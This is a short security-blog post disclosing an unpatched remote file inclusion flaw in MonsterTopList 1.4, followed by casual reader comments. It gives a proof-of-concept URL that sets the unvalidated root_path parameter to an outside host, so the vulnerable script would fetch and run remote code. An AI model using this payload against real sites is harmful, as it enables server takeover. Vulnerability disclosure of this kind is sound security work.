MonsterTopList
=================================
MonsterTopList- Remote Code Execution bug
By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4
Risk: Moderate
Status: unpatched
=================================
This flaw is due to an input validation error in the "sources/functions.php"(line 8)
script that does not validate the "$root_path" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
code:file sources/functions.php
line 8: require $root_path . "sources/func_output.php";
demo:
http://www.monstertoplist.com/demo.html
POC Exploit http://[target]/[path]/sources/functions.php?
root_path=http://unsecured-systems.com/forum/
der4444 at 07:07
5 Comments:
glad to see VietMafia on blog!
2:19 PM
He had problems posting to the forum.. It seems that the IDS for the hoster has some problems and blocks some requests.
Maybe it will be fixed with upgrade of board, or maybe hoster has something wrong.
9:31 PM
hm... i did now about that probz.. i had made some posts in last days without probz..
If he want own account in this blog just let me now.
as i told in next days i will upgrade board , about hoster der4444 you know that is quit good .
10:38 PM
r0t,
it's quite nice if i can have own account on this blog.i'm learning so i will try my best :)
VietMafia
6:12 PM
VietMafia, ok. invitation will be sent to your email that you had registred on board.
4:12 PM
Post a Comment
<< Home